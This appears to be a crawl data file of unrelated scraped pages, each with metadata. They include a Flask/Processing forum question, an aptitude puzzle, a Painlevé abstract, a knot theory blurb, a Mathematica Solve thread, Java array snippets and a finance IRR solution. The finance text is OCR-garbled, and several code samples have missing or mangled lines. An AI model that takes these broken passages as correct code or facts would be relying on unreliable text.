[ null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI2MDAiIGhlaWdodD0iMTM2NiIgdmlld0JveD0iMCAwIDYwMCAxMzY2Ij48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBzdHlsZT0iZmlsbDojY2ZkNGRiO2ZpbGwtb3BhY2l0eTogMC4xOyIvPjwvc3ZnPg==", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94014364,"math_prob":0.9294934,"size":1093,"snap":"2023-40-2023-50","text_gpt3_token_len":193,"char_repetition_ratio":0.10560147,"word_repetition_ratio":0.0,"special_character_ratio":0.1610247,"punctuation_ratio":0.09195402,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9553512,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-04T10:57:57Z\",\"WARC-Record-ID\":\"<urn:uuid:5447b262-65aa-40cf-8c1f-9aba37ad5c9b>\",\"Content-Length\":\"77765\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:31b19401-c40d-4ebb-9bf7-ae3330e2afa0>\",\"WARC-Concurrent-To\":\"<urn:uuid:23405b28-924b-4223-857f-7ba6558a5eeb>\",\"WARC-IP-Address\":\"82.180.175.187\",\"WARC-Target-URI\":\"https://newshuntexpress.com/saudi-german-foreign-ministers-hold-talks-in-jeddah/\",\"WARC-Payload-Digest\":\"sha1:ANZYOSNGWYRM42CSUFGCINDPLY4PK2O2\",\"WARC-Block-Digest\":\"sha1:RMGPV3SMYKAKSFVAZB4NTMLAQWTWPARC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511364.23_warc_CC-MAIN-20231004084230-20231004114230-00449.warc.gz\"}"}
https://discourse.processing.org/t/loading-json-array-in-flask/41858
[ "Hi! I’m working on a website using Python and Flask. One of the pages needs to render a processing sketch, with the fill() parameter based on data in a list that is created in the Flask project file app.py. Basically, in the page route, I create a colormap and then extract the RGB of the colors in that colormap and put it in a list. I then convert that list into a JSON array and save it in a JSON file. The route returns a render_template of an html file which renders the processing file. In the processing file, I want to loop through the list of colours with each loop resulting in the fill() being a different colour in the list. I tried to “send” this variable using template variables in the html file, but no matter what I do it doesn’t work. So I landed on this attempt which is saving the object to JSON and importing it to processing. Although I can’t figure out how to do this. The loadJSON method seems to be incompatible for websites as its not in Javascript. Keep in mind that the list is not static, hence why I’m not just hardcoding it. The colormap parameters will change based on changes in other data in my python script.\n\nHere’s what I have.\n\nHere is the route in app.py:\n\n``````@app.route('/processor')\ndef processor():\npalette = Cubehelix.make(start=0.3, rotation=-0.5, n=10)\nparticleArray = palette.colors\nwith open(\"particleArray.json\", 'w') as f:\njson.dump(particleArray, f)\nwith open(\"particleArray.json\") as f:\nreturn render_template('a.html')\n``````\n\nThis is a.html that is being rendered by the above route:\n\n``````<!DOCTYPE html>\n<html lang=\"en\">\n<meta charset=\"UTF-8\">\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n<title>My Processing Sketch</title>\n<script src=\"https://cdn.jsdelivr.net/processing.js/1.4.8/processing.min.js\"></script>\n</script>\n<body>\n<canvas data-processing-sources=\"{{url_for('static', filename= 'myProgram.pde')}}\"></canvas>\n</body>\n</html>\n``````\n\nHere is myProgram.pde where my Processing sketch is stored:\n\n``````JSONObject json;\n\nint dim;\n\nvoid setup() {\nsize(800, 800);\ndim = width/2;\nbackground(0);\nnoStroke();\n}\n\nvoid draw() {\nbackground(0);\nfor (int x = 0; x <= width; x+=dim) {\nfilter(BLUR,4);\n}\n}\n\nvoid drawGradient(float x, float y) {\nfloat a= 0;\nint h= 0;\nint len= values.size();\nfor (int r = radius; r > 0; --r) {\nint[] help= values.getInt(h);\nfill(help,help,help);\nellipse(x, y, r+30, r);\na+=10;\nh++;\nif (h >= len) {\nh=0;\n}\n}\n}\n``````\n\nThis together renders the Processing canvas but it’s just black. Nothing is being drawn. I thought maybe I should try to write it in p5.js way because perhaps the loadJSONArray is not a thing for Javascript and wrote this version of the Processing sketch as tester.pde (and changed the html file to point to this file). This just renders a blank page. No canvas, nothing.\n\n``````let particleArray;\n\n}\n\nfunction setup() {\ncreateCanvas(800, 800);\nbackground(0);\nnoStroke();\n}\n\nfunction draw() {\nbackground(0);\nfor (let x = 0; x <= width; x += dim) {\nfilter(BLUR, 4);\n}\n}\n\nlet radius = dim * 2;\nlet a = 0;\nlet h = 0;\nlet len = particleArray.length;\nlet angle = radians(30 + a);\nfor (let r = radius; r > 0; --r) {" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6936727,"math_prob":0.6178733,"size":3807,"snap":"2023-14-2023-23","text_gpt3_token_len":1018,"char_repetition_ratio":0.10018407,"word_repetition_ratio":0.031088082,"special_character_ratio":0.29655898,"punctuation_ratio":0.18181819,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97667664,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-28T06:26:27Z\",\"WARC-Record-ID\":\"<urn:uuid:4167de77-bdac-4333-bd3b-fa8a01708635>\",\"Content-Length\":\"21009\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1d72abcb-792f-4cc5-a565-453fdf0b00df>\",\"WARC-Concurrent-To\":\"<urn:uuid:12756851-03ad-4d21-9ff8-032306648441>\",\"WARC-IP-Address\":\"74.82.16.203\",\"WARC-Target-URI\":\"https://discourse.processing.org/t/loading-json-array-in-flask/41858\",\"WARC-Payload-Digest\":\"sha1:KT4DEWGL4HM74E7S32LEPWSIIYJJE2J2\",\"WARC-Block-Digest\":\"sha1:JXPPSLSONMD7FHEEH6QMYRXCKJZEORXI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224643585.23_warc_CC-MAIN-20230528051321-20230528081321-00758.warc.gz\"}"}
https://www.wikitechy.com/interview-questions/aptitude/numbers/the-total-number-of-two-digit-positive-integer-lesser-than-100
[ "# The total number of two-digit positive integer lesser than 100, which are not divisible by 2, 3 and 5 is ?\n\nThe total number of two-digit positive integer lesser than 100, which are not divisible by 2, 3 and 5 is ?\n\nA. 23\n\nB. 24\n\nC. 25\n\nD. 26\n\n## Explanation:\n\nNumbers less than 100 divisible by 2 are 10, 12, 14, 16,...,98.\nTotal numbers divisible by 2 are 45\nRemaining numbers are 11, 13, 15, 17, 19...99 = 45\n\nNumbers divisible by 3 in the above numbers are 15, 21, 27, 33, 39, 45, 51, 57, 63, 69, 75, 81, 87, 93 and 99.\nTotal numbers divisible by 3 are = 15\nRemaining integers = 45-15 = 30.\n\nNumbers divisible by 5 in the remaining numbers = 25, 35, 55, 65, 85, 95\nTotal numbers = 6\nRemaining 30-6 = 24.\n\nSo 24 numbers are not divisible by 2, 3 and 5." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.917882,"math_prob":0.9996685,"size":757,"snap":"2019-51-2020-05","text_gpt3_token_len":280,"char_repetition_ratio":0.20982736,"word_repetition_ratio":0.24183007,"special_character_ratio":0.44385734,"punctuation_ratio":0.25365853,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996617,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-13T07:50:30Z\",\"WARC-Record-ID\":\"<urn:uuid:78241206-7fe0-4e3c-904c-96a8465fbd50>\",\"Content-Length\":\"40665\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:977d5078-09b9-400d-bbaa-8b1e08f429f8>\",\"WARC-Concurrent-To\":\"<urn:uuid:f1db95a9-edc5-4660-9f38-71f546c209a6>\",\"WARC-IP-Address\":\"162.144.36.172\",\"WARC-Target-URI\":\"https://www.wikitechy.com/interview-questions/aptitude/numbers/the-total-number-of-two-digit-positive-integer-lesser-than-100\",\"WARC-Payload-Digest\":\"sha1:A3CEABTK4ZDJVVTP6QFT4YXSOUNGD6PN\",\"WARC-Block-Digest\":\"sha1:SCEWWGVBY65PAK6BKD4NL5U7DOBGWAS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540551267.14_warc_CC-MAIN-20191213071155-20191213095155-00209.warc.gz\"}"}
https://researchnow.flinders.edu.au/en/publications/exact-solutions-of-a-q-discrete-second-painlev%C3%A9-equation-from-its-2
[ "# Exact solutions of a q-discrete second Painlevé equation from its iso-monodromy deformation problem. II. Hypergeometric solutions: {II}. {H}ypergeometric solutions\n\nNalini Joshi, Yang Shi\n\nResearch output: Contribution to journalArticle\n\n7 Citations (Scopus)\n\n## Abstract\n\nThis is the second part of our study of the solutions of a q -discrete second Painlevé equation (q-PII)of type (A2 + A1)(1) via its iso-monodromy deformation problem. In part I, we showed how to use the q-discrete linear problem associated with q-P II to find an infinite sequence of exact rational solutions. In this paper, we study the case giving rise to an infinite sequence of q-hypergeometric-type solutions. We find a new determinantal representation of all such solutions and solve the iso-monodromy deformation problem in closed form.\n\nOriginal language English 3247-3264 18 PROCEEDINGS OF THE ROYAL SOCIETY OF LONDON SERIES A-MATHEMATICAL PHYSICAL AND ENGINEERING SCIENCES 468 2146 https://doi.org/10.1098/rspa.2012.0224 Published - 8 Oct 2012 Yes\n\n## Keywords\n\n• discrete Painlevé equation\n• iso-mondromy deformation\n• special solutions\n• Discrete Painlevé equation\n• Iso-monodromy deformation\n• Special solutions" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7375851,"math_prob":0.40806955,"size":2041,"snap":"2020-45-2020-50","text_gpt3_token_len":599,"char_repetition_ratio":0.1281296,"word_repetition_ratio":0.6188925,"special_character_ratio":0.266536,"punctuation_ratio":0.0855615,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9880911,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-29T20:56:46Z\",\"WARC-Record-ID\":\"<urn:uuid:6cb4adc9-2df0-44a7-9c5e-cebcfa3803e7>\",\"Content-Length\":\"42289\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13f82be5-e28e-4ee6-a20b-6c32d0401af2>\",\"WARC-Concurrent-To\":\"<urn:uuid:f6ee2401-cf4d-4bca-83b3-4eebec731d27>\",\"WARC-IP-Address\":\"18.139.148.124\",\"WARC-Target-URI\":\"https://researchnow.flinders.edu.au/en/publications/exact-solutions-of-a-q-discrete-second-painlev%C3%A9-equation-from-its-2\",\"WARC-Payload-Digest\":\"sha1:5TMVTKIU3ELM3DNUVBLQQN2ZGWWJKH2L\",\"WARC-Block-Digest\":\"sha1:VERM7O4CBVJWVGR2LMPBPTVRR55YQJB5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107905777.48_warc_CC-MAIN-20201029184716-20201029214716-00274.warc.gz\"}"}
https://learnawesome.org/topics/00a0255c-fe5e-4924-bf55-e4ded267f6e3
[ "## Knot Theory\n\nThis is a topic under mathematics.\n\nIn topology, knot theory is the study of mathematical knots. While inspired by knots which appear in daily life, such as those in shoelaces and rope, a mathematical knot differs in that the ends are joined together so that it cannot be undone, the simplest knot being a ring. In mathematical language, a knot is an embedding of a circle in 3-dimensional Euclidean space, . Two mathematical knots are equivalent if one can be transformed into the other via a deformation of upon itself ; these transformations correspond to manipulations of a knotted string that do not involve cutting the string or passing the string through itself." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9244447,"math_prob":0.929938,"size":680,"snap":"2022-27-2022-33","text_gpt3_token_len":134,"char_repetition_ratio":0.14497042,"word_repetition_ratio":0.0,"special_character_ratio":0.1882353,"punctuation_ratio":0.0952381,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97229517,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-01T10:27:06Z\",\"WARC-Record-ID\":\"<urn:uuid:70d31af9-c444-45c8-b246-fdbcbed7f54f>\",\"Content-Length\":\"31265\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8c44db3d-23d2-4046-a668-4b8398e0fe32>\",\"WARC-Concurrent-To\":\"<urn:uuid:1730f733-1aff-45ce-8720-4daa5483aa06>\",\"WARC-IP-Address\":\"78.47.128.79\",\"WARC-Target-URI\":\"https://learnawesome.org/topics/00a0255c-fe5e-4924-bf55-e4ded267f6e3\",\"WARC-Payload-Digest\":\"sha1:Z4WJNUCJZYZDRONYNVIDLLMJNSSRMIXG\",\"WARC-Block-Digest\":\"sha1:AUUN4MEGHAYQLMPDTYQI6OPF36YWDFS2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103940327.51_warc_CC-MAIN-20220701095156-20220701125156-00338.warc.gz\"}"}
http://forums.wolfram.com/mathgroup/archive/2010/Sep/msg00636.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "Re: Question on Solve\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg112747] Re: Question on Solve\n• From: Andrzej Kozlowski <akoz at mimuw.edu.pl>\n• Date: Wed, 29 Sep 2010 04:13:31 -0400 (EDT)\n\n```Actually, in Mathematica 7\n\nSimplify[Solve[eqs, vars]]\nDuring evaluation of In:== Solve::svars:Equations may not give solutions for all \"solve\" variables. >>\n\n{{v1 -> I*v8, v2 -> -v8, v3 -> -v8, v4 -> (-I)*v8,\nv5 -> v8, v6 -> I*v8, v7 -> (-I)*v8}}\n\nwhich is the general answer, I believe (it includes the trivial case).\n\nSo the question still remains why:\n\nReduce[eqs, vars]\n\nv1 ==== 0 && v2 ==== 0 && v3 ==== 0 && v4 ==== 0 && v5 ==== 0 &&\nv6 ==== 0 && v7 ==== 0 && v8 ==== 0\n\nAndrzej Kozlowski\n\nOn 28 Sep 2010, at 16:21, Andrzej Kozlowski wrote:\n\n> I don't think one can fault Solve since it is not supposed to return comp=\nlete solutions anyway. I don't have anymore Mathematica 5.2 installed but M=\nathematica 7 returns a very complex output to your second example and produ=\nces a warning that it may not give solutions for all Solve variables. The o=\nutput is too complicated for me to try to check if it is correct (in some s=\nense anyway) or not.\n>\n> However, here is something that does worry me a little more:\n>\n> eqs == {(-3*Sqrt*v1 + v2 + 17*v3 + (8*I)*Sqrt*v3 -\n> 9*Sqrt*v4 + 9*v5 - Sqrt*v6 - 3*Sqrt*v7 + 9*v8)/16 ====\n> 0, (5*v1 - Sqrt*v2 + 3*Sqrt*v3 + 11*v4 + (8*I)*Sqrt*v4 -\n> 5*Sqrt*v5 + 3*v6 - 3*v7 - Sqrt*v8)/16 ====\n> 0, (-(Sqrt*v1) + 3*v2 + 3*v3 + 5*Sqrt*v4 +\n> 11*v5 + (8*I)*Sqrt*v5 - 3*Sqrt*v6 - Sqrt*v7 - 5*v8)/\n> 16 ==== 0, (-9*v1 - 3*Sqrt*v2 + Sqrt*v3 + 9*v4 +\n> 9*Sqrt*v5 + 17*v6 + (8*I)*Sqrt*v6 - v7 - 3*Sqrt*v8)/\n> 16 ==== 0, (9*v1 - Sqrt*v2 + 3*Sqrt*v3 - 9*v4 +\n> 3*Sqrt*v5 - v6 + 17*v7 + (8*I)*Sqrt*v7 - 9*Sqrt*v8)/\n> 16 ==== 0, (-5*Sqrt*v1 + 3*v2 + 3*v3 + Sqrt*v4 - 5*v5 +\n> Sqrt*v6 + 3*Sqrt*v7 + 11*v8 + (8*I)*Sqrt*v8)/16 ====\n> 0, ((11 + (8*I)*Sqrt)*v1 - 3*Sqrt*v2 + Sqrt*v3 + 5*v4 +\n> Sqrt*v5 - 3*v6 + 3*v7 + 5*Sqrt*v8)/16 ====\n> 0, (9*Sqrt*v1 + (17 + (8*I)*Sqrt)*v2 + v3 + 3*Sqrt*v4 +\n> 9*v5 + 3*Sqrt*v6 + Sqrt*v7 + 9*v8)/16 ==== 0};\n> vars == {v1, v2, v3, v4, v5, v6, v7, v8};\n>\n>\n>\n> Reduce[eqs, vars]\n>\n> v1 ==== 0 && v2 ==== 0 && v3 ==== 0 && v4 ==== 0 && v5 ==== 0 &&\n> v6 ==== 0 && v7 ==== 0 && v8 ==== 0\n>\n>\n> However, let's just add the condition that not all vi's are 0 and we get:\n>\n> Reduce[And @@ eqs && ! And @@ Thread[vars ==== 0], vars]\n>\n> v2 ==== I*v1 && v3 ==== I*v1 && v4 ==== -v1 &&\n> v5 ==== (-I)*v1 && v6 ==== v1 && v7 ==== -v1 &&\n> v8 ==== (-I)*v1 && v1 !== 0\n>\n>\n> Note that your particular solution is a special case of this one. The gen=\neral solution should be the disjunction of the trivial solution, that Reduc=\ne returned and this solutions. It seems to me that this is exactly what Red=\nuce ought to have returned. Of course Solve could not return this since it =\ncan't return inequalities.\n>\n> Andrzej Kozlowski\n>\n> On 28 Sep 2010, at 12:04, carlos at colorado.edu wrote:\n>\n>> I have noticed some erratic behavior of Solve,\n>> illustrated in the following two examples.\n>> Suppose I have 8 homogenous linear equations\n>>\n>> eqs=={(9*v1-3*Sqrt*v2+v3+v4-(8*I)*Sqrt*v4-\n>> 9*Sqrt*v5+9*v6-Sqrt*v7-3*Sqrt*v8)/16====0,\n>> (-(Sqrt*v1)+5*v2-Sqrt*v3+3*Sqrt*v4-5*v5-\n>> (8*I)*Sqrt*v5-5*Sqrt*v6+3*v7-3*v8)/16====0,\n>> (-5*v1-Sqrt*v2+3*v3+3*v4+5*Sqrt*v5-5*v6-\n>> (8*I)*Sqrt*v6-3*Sqrt*v7-Sqrt*v8)/16====0,\n>> (-3*Sqrt*v1-9*v2-3*Sqrt*v3+Sqrt*v4+9*v5+\n>> 9*Sqrt*v6+v7-(8*I)*Sqrt*v7-v8)/16====0,\n>> (-9*Sqrt*v1+9*v2-Sqrt*v3+3*Sqrt*v4-9*v5+\n>> 3*Sqrt*v6-v7+v8-(8*I)*Sqrt*v8)/16====0,\n>> ((-5-(8*I)*Sqrt)*v1-5*Sqrt*v2+3*v3+3*v4+\n>> Sqrt*v5-5*v6+Sqrt*v7+3*Sqrt*v8)/16====0,\n>> (5*Sqrt*v1+(-5-(8*I)*Sqrt)*v2-3*Sqrt*v3+\n>> Sqrt*v4+5*v5+Sqrt*v6-3*v7+3*v8)/16====0,\n>> (9*v1+9*Sqrt*v2+v3-(8*I)*Sqrt*v3+v4+\n>> 3*Sqrt*v5+9*v6+3*Sqrt*v7+Sqrt*v8)/16====0};\n>>\n>> The variables are\n>> v=={v1,v2,v3,v4,v5,v6,v7,v8};\n>> Then\n>> sol==Solve[eqs,v]; Print[sol];\n>>\n>> gives the parametric solution\n>> {{v4->-v3,v5->v2,v6->(-2*I)*v2-v3,\n>> v7->-3*v2+(2*I)*v3,v8->-3*v2+(2*I)*v3,v1->(2*I)*v2+v3}};\n>> which is correct.\n>>\n>> Change the above equations to\n>>\n>> eqs=={(-3*Sqrt*v1+v2+17*v3+(8*I)*Sqrt*v3-\n>> 9*Sqrt*v4+9*v5-Sqrt*v6-3*Sqrt*v7+9*v8)/16====0,\n>> (5*v1-Sqrt*v2+3*Sqrt*v3+11*v4+(8*I)*Sqrt*v4-\n>> 5*Sqrt*v5+3*v6-3*v7-Sqrt*v8)/16====0,\n>> (-(Sqrt*v1)+3*v2+3*v3+5*Sqrt*v4+11*v5+\n>> (8*I)*Sqrt*v5-3*Sqrt*v6-Sqrt*v7-5*v8)/16====0,\n>> (-9*v1-3*Sqrt*v2+Sqrt*v3+9*v4+9*Sqrt*v5+\n>> 17*v6+(8*I)*Sqrt*v6-v7-3*Sqrt*v8)/16====0,\n>> (9*v1-Sqrt*v2+3*Sqrt*v3-9*v4+3*Sqrt*v5-v6+\n>> 17*v7+(8*I)*Sqrt*v7-9*Sqrt*v8)/16====0,\n>> (-5*Sqrt*v1+3*v2+3*v3+Sqrt*v4-5*v5+Sqrt*v6+\n>> 3*Sqrt*v7+11*v8+(8*I)*Sqrt*v8)/16====0,\n>> ((11+(8*I)*Sqrt)*v1-3*Sqrt*v2+Sqrt*v3+5*v4+\n>> Sqrt*v5-3*v6+3*v7+5*Sqrt*v8)/16====0,\n>> (9*Sqrt*v1+(17+(8*I)*Sqrt)*v2+v3+3*Sqrt*v4+\n>> 9*v5+3*Sqrt*v6+Sqrt*v7+9*v8)/16====0};\n>> v=={v1,v2,v3,v4,v5,v6,v7,v8};\n>>\n>> sol==Solve[eqs,v]; Print[sol];\n>>\n>> and I get only the trivial solution\n>> {{v1->0,v2->0,v3->0,v4->0,v5->0,v6->0,v7->0,v8->0}};\n>>\n>> But the system has an infinity of nontrivial solutions,\n>> for example (this one was obtained with another method)\n>>\n>> vsol=={v1->-I,v2->1,v3->1,v4->I,v5->-1,v6->-I,v7->I,v8->-1};\n>> Print[Simplify[eqs/.vsol]];\n>> gives {True,True,True,True,True,True,True,True};\n>>\n>> These 2 examples are extracted from several thousands\n>> similar ones. Solve returns the trivial solution in\n>> about 1/3 of the instances. Mathematica version used\n>> is 5.2 under Mac OS 10.5.9.\n>>\n>> Question: what do I have to do to get the correct\n>> parametric answers in all cases?\n>>\n>\n\n```\n\n• Prev by Date: Re: Root Finding Methods Gaurenteed to Find All Root Between (xmin, xmax)\n• Next by Date: Re: Root Finding Methods Gaurenteed to Find All Root Between (xmin, xmax)\n• Previous by thread: Re: Question on Solve\n• Next by thread: Re: Question on Solve" ]
[ null, "http://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "http://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/1.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6063017,"math_prob":0.9925914,"size":5898,"snap":"2020-24-2020-29","text_gpt3_token_len":2770,"char_repetition_ratio":0.24957584,"word_repetition_ratio":0.071078435,"special_character_ratio":0.55764663,"punctuation_ratio":0.10898797,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9978216,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-28T13:24:47Z\",\"WARC-Record-ID\":\"<urn:uuid:ffe03d16-aa99-4ee1-8445-a8513e62ae4c>\",\"Content-Length\":\"49994\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:206f096e-ba96-4c08-8fc5-2d6ec9cb07fe>\",\"WARC-Concurrent-To\":\"<urn:uuid:49f93f08-a2ad-41cd-b05c-3a47cbc8a971>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"http://forums.wolfram.com/mathgroup/archive/2010/Sep/msg00636.html\",\"WARC-Payload-Digest\":\"sha1:5OG4V45BVU5BV44CZGFHPT3NFSLOV5LG\",\"WARC-Block-Digest\":\"sha1:DRFEH6CN5CA7GO25MQUGXIO73D6FOMZU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347396089.30_warc_CC-MAIN-20200528104652-20200528134652-00318.warc.gz\"}"}
https://code-fetcher.com/uncategorised/two-dimensional-arrays-java-code-example
[ "# Two Dimensional Arrays Java Code Example\n\nSnippet 1\n\n``` ``` Two dimensional array:\nint[][] twoD_arr = new int;\n\nThree dimensional array:\nint[][][] threeD_arr = new int;\n``` ```\n\nSnippet 2\n\n``` ``` //Length\nint[][]arr= new int [filas][columnas];\narr.length=filas;\n\nint[][] a = {\n{1, 2, 3},\n{4, 5, 6, 9},\n{7},\n};\n\n// calculate the length of each row\nSystem.out.println(\"Length of row 1: \" + a.length);\nSystem.out.println(\"Length of row 2: \" + a.length);\nSystem.out.println(\"Length of row 3: \" + a.length);\n}``` ```\n\nSnippet 3\n\n` ` int[][] arr = new int[m][n]; ` `\n\nSnippet 4\n\n``` ``` # In python, one dimensional array look like this:\n\narray = ['plain', ' and ', 'boring!']\n\n# and I'd call an index of that one dimensiona list like this:\n\nprint(array)\n\n>> boring!\n\n# \"Okay, nice, but what is a 2D array?\" I hear you ask...\n# Well, a 2D array would look like this:\n\narray = (['wow, ', 'that is ', 'so ']\n['cool', ' it has ', 'two rows!'])\n\n# The 2D array has two rows instead of one.\n# You can call its index like this:\n\nprint(array) # is the index of the second row and is the index\n# for 'two rows!'\n\n>> two rows!\n\n# And a 3D array would look like this:\n\narray = ([1, 2, 3]\n[4, 5, 6]\n[7, 8, 9])``` ```\n\n## Similar Snippets\n\nFor Each Javascript Code Example – java\n\nWhile Loop Continue Js Code Example – java\n\nJava Creat A Folder Code Example – java\n\nJs How To Prevent A Code From Runing Code Example – java\n\nRemove Last Letter From String Java Code Example – java\n\nCreate Copy Of Array From Another Array Code Example – java\n\nFind Duplicates In Arraylist Java Code Example – java\n\nSimpledateformat Example Java Code Example – java\n\nArray Fot String Code Example – java\n\nJava Get Random Index From Array Code Example – java\n\nHow To Round A Number Javascript Code Example – java\n\nFirestore Find Doc And Set Data Code Example – java\n\nJava How To Get Files In Resources Code Example – java\n\nDifferent Types Of Writing If Else Statements Jav Code Example – java\n\nHow To Take A Image As A Background In Tkinter In Python Code Example – java\n\nCreating Java Main Method Code Example – java\n\nSwitch Case Accepts Byte In Java Code Example – java\n\nFind Duplicate And Repeating Number In Array Code Example – java" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5732572,"math_prob":0.8439144,"size":2138,"snap":"2023-40-2023-50","text_gpt3_token_len":601,"char_repetition_ratio":0.20431115,"word_repetition_ratio":0.064599484,"special_character_ratio":0.3152479,"punctuation_ratio":0.14479639,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99127585,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-02T12:09:45Z\",\"WARC-Record-ID\":\"<urn:uuid:5df19760-6ebf-41ef-a9f9-648fd11c0323>\",\"Content-Length\":\"45547\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c08263db-3662-4b6c-81f6-978cba1c9f15>\",\"WARC-Concurrent-To\":\"<urn:uuid:36039eda-dc3b-4306-a8f4-73179d7efd26>\",\"WARC-IP-Address\":\"84.32.84.247\",\"WARC-Target-URI\":\"https://code-fetcher.com/uncategorised/two-dimensional-arrays-java-code-example\",\"WARC-Payload-Digest\":\"sha1:WBAUDI2UHMO6GCFLYZQZO7BWA2GIRVIC\",\"WARC-Block-Digest\":\"sha1:EDQK5SN62XKLNR5RZE66X7BPNZC7XEN6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510994.61_warc_CC-MAIN-20231002100910-20231002130910-00308.warc.gz\"}"}
https://www.finance-assignments.com/solutions-2-4410
[ "Select Page\n\nSolution\n\n1. The sum of cash-inflows of l Hitherto machines is Rs 93,000 which when divided by the economic life of the machine (5 rears). results in a ‘fake annuity’ of Rs 18.600.\n2. Dividing the blini outlay of Rs by R, 18.600, we have ‘fake average pay hack period’ of 3.017 years.\n3. In Table A-4. the factor closest 10 3.017 for ~ rears is 2.991 for a Me of 20 per cent.\n4, Since Ihe actual cash flows in the earlier years arc greater than the average cash flows of R<‘18,600 in machine B. a subjective increase of. say, 1 per cent is made. This makes an estimated rate of IRR 21 per cent for machine II. In the case of machine A. since cash inflows in the initial rears arc smaller than the average cash flows, a subjective decrease of, say, 2 pcr cent is ‘made. This makes the estimated IRR rare 18 per cent for Michelin A. . S. Using the PV factors for 21 per cent (Mainline and II! per cent (Machine AI from Table A-3 for years 1-5, the PVs are calculated In Tank 10.1", null, "6. Since the NPV” negative for hath the machine’. the demount rate should he subsequently lowered. In the G””- of machine A the is of Rs 572 whereas in machine B the difference is Rs 107. Therefore, in the fonder case the discount rate is lowered  y 1 per cent in both the Case S. As a result, the new discount rate would be 17 per cent for A and 20 per cent for B.The calculations’given in Table 10.14 shows that the NPV at discount rate of 17 per cent is Rs 853 (machine A) and .Rs 1.049 for machine B at 20 per cent discount.", null, "(a) For machine A: Since 17 per cent and 18 per cent arc consecutive discount rates then give positive and negative net present values, interpolation method can be applied to find the actual IRR which will be between 17 and 18 per cent", null, "" ]
[ null, "http://www.finance-assignments.com/wp-content/uploads/2014/09/14-300x91.png", null, "http://www.finance-assignments.com/wp-content/uploads/2014/09/23-300x87.png", null, "http://www.finance-assignments.com/wp-content/uploads/2014/09/3-300x69.png", null ]
